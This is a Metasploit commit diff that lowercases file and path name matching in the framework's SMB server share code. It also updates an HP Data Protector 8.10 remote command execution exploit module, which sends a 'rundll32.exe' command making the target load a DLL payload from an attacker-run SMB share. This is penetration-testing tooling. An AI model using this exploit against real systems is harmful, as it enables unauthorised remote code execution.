Fix downcase path handling

jvazquez-r7 · jvazquez-r7 · commit 36375fab2884 · 2015-03-04T12:58:41.000-06:00
diff --git a/lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb b/lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb
@@ -26,13 +26,13 @@ def smb_cmd_nt_create_andx(c, buff)
               payload = file_name
             end
 
-            if payload.ends_with?(file_name)
+            if payload.ends_with?(file_name.downcase)
               vprint_status("SMB Share - #{smb[:ip]} SMB_COM_NT_CREATE_ANDX request for #{unc}... ")
               fid = smb[:file_id].to_i
               attribs = CONST::SMB_EXT_FILE_ATTR_NORMAL
               eof = file_contents.length
               is_dir = 0
-            elsif payload.eql?(path_name)
+            elsif payload.eql?(path_name.downcase)
               fid = smb[:dir_id].to_i
               attribs = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
               eof = 0
diff --git a/lib/msf/core/exploit/smb/server/share/information_level/find.rb b/lib/msf/core/exploit/smb/server/share/information_level/find.rb
@@ -14,14 +14,14 @@ module Find
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_both_directory_info(c, path)
 
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
               length = file_contents.length
               ea = 0
               alloc = 1048576 # Allocation Size = 1048576 || 1Mb
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
               search = 1
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               data = Rex::Text.to_unicode(path_name)
               length = 0
               ea = 0x21
@@ -50,9 +50,9 @@ def smb_cmd_find_file_both_directory_info(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_names_info(c, path)
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               data = Rex::Text.to_unicode(path_name)
             else
               return smb_error(CONST::SMB_COM_TRANSACTION2, c, CONST::SMB_STATUS_NO_SUCH_FILE, true)
@@ -68,14 +68,14 @@ def smb_cmd_find_file_names_info(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_full_directory_info(c, path)
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
               length = file_contents.length
               ea = 0
               alloc = 1048576 # Allocation Size = 1048576 || 1Mb
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL # File
               search = 0x100
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               data = Rex::Text.to_unicode(path_name)
               length = 0
               ea = 0x21
diff --git a/lib/msf/core/exploit/smb/server/share/information_level/query.rb b/lib/msf/core/exploit/smb/server/share/information_level/query.rb
@@ -50,11 +50,11 @@ def smb_cmd_trans_query_file_info_standard(c, fid)
           # @return [Fixnum] The number of bytes returned to the client as response.
           # @todo Delete elsif comment if testing proofs it as unnecessary
           def smb_cmd_trans_query_path_info_basic(c, path)
-            if path && path.ends_with?(file_name)
+            if path && path.ends_with?(file_name.downcase)
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
             #elsif path && path.ends_with?(file_name + '.Local')
               #attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
             elsif path.nil? || path.empty? || path == "\x00" # empty path
               attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
@@ -72,9 +72,9 @@ def smb_cmd_trans_query_path_info_basic(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_path_info_standard(c, path)
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               attrib = 0 # File attributes => file
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               attrib = 1 # File attributes => directory
             elsif path.nil? || path.empty? || path == "\x00" # empty path
               attrib = 1 # File attributes => directory
@@ -99,9 +99,9 @@ def smb_cmd_trans_query_path_info_standard(c, path)
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_path_info_network(c, path)
 
-            if path && path.include?(file_name)
+            if path && path.include?(file_name.downcase)
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
-            elsif path && path == path_name
+            elsif path && path == path_name.downcase
               attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
             elsif path.nil? || path.empty? || path == "\x00" # empty path
               attrib = CONST::SMB_EXT_FILE_ATTR_DIRECTORY
diff --git a/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb b/modules/exploits/windows/misc/hp_dataprotector_dll_cmd_exec.rb
@@ -7,6 +7,7 @@
 
 class Metasploit3 < Msf::Exploit::Remote
   Rank = ExcellentRanking
+
   include Msf::Exploit::Remote::Tcp
   include Msf::Exploit::Remote::SMB::Server::Share
   include Msf::Exploit::EXE
@@ -34,8 +35,14 @@ def initialize(info={})
         {
           'EXITFUNC' => 'thread',
         },
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
       'Privileged'     => true,
       'Platform'       => 'win',
+      'Stance'         => Msf::Exploit::Stance::Aggressive,
       'Targets'        =>
         [
           [ 'HP Data Protector 8.10 / Windows', { } ],
@@ -46,7 +53,8 @@ def initialize(info={})
       register_options(
         [
           Opt::RPORT(5555),
-          OptString.new('FILE_NAME', [ false, 'DLL File name to share', 'exploit.dll'])
+          OptString.new('FILE_NAME', [ false, 'DLL File name to share']),
+          OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15])
         ], self.class)
 
       deregister_options('FILE_CONTENTS')
@@ -117,4 +125,22 @@ def primer
     sploit = "rundll32.exe #{unc},#{rand_text_numeric(1)}"
     send_pkt(sploit)
   end
+
+  def setup
+    super
+
+    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.dll"
+
+    unless file_name =~ /\.dll$/
+      fail_with(Failure::BadConfig, "FILE_NAME must end with .dll")
+    end
+  end
+
+  def exploit
+    begin
+      Timeout.timeout(datastore['SMB_DELAY']) {super}
+    rescue Timeout::Error
+      # do nothing... just finish exploit and stop smb server...
+    end
+  end
 end
